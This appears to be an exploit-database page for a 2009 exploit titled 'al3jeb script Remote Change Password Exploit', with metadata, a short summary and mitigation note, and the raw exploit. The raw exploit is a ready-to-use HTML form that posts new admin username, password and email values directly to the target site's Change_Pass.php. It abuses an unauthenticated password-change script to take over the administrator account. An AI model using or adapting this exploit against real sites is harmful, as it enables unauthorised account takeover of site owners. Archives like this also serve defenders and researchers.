header-logo
Suggest Exploit
vendor:
al3jeb script
by:
alnjm33
6,4
CVSS
MEDIUM
Remote Change Password Exploit
287
CWE
Product Name: al3jeb script
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

al3jeb script Remote Change Password Exploit

This exploit allows an attacker to remotely change the password of an al3jeb script. The attacker needs to provide the username, password and email address of the target account. The exploit was discovered by alnjm33 and tested on version 1.3 of the al3jeb script.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the al3jeb script to the latest version.
Source

Exploit-DB raw data:

<!--------
Exploit Title :al3jeb script Remote Change Password Exploit
Author: alnjm33
Software Link: http://www.traidnt.net/vb/attachment.php?attachmentid=354606&d=1237376300
Version: 1.3
Tested on:1.3
MY home : Sec-war.com
:::::::::::::::exploit:::::::::::::::::::::
---------->

<html>
<head>
<title> al3jeb script Remote Change Password Exploit  </title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form action=http://SITE/al3jeb/Change_Pass.php method=post style="text-align: center">
<b>For More </b>
<p><b>visit us</b></p>
<p>
<a href="http://sec-war.com/cc/index.php" style="text-decoration: none; font-weight: 700">
http://sec-war.com/cc/index.php</a></p>
<p>
<br>
User: <input name="adminn" type="text" id="adminn" value="" />
<br>
Pass: <input name="adminp" type="password" id="adminp" value=""  />
<br>
Email <input name="mail" type="text" id="adminm" value="" />
<br>
<input type="submit" name="Submit" value="Sec-War" /><br>
&nbsp;<br>
</p>
</form>
</body>
<html>
<!----------
:::::::::::::::::::::::::::::::
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso -JaMbA-RoOt_EgY-jago-dz-XR57 all sec-war.com members
:::::::::::::::::::::::::::::
----------->

Navigation

Suggest Exploit

Services By CQR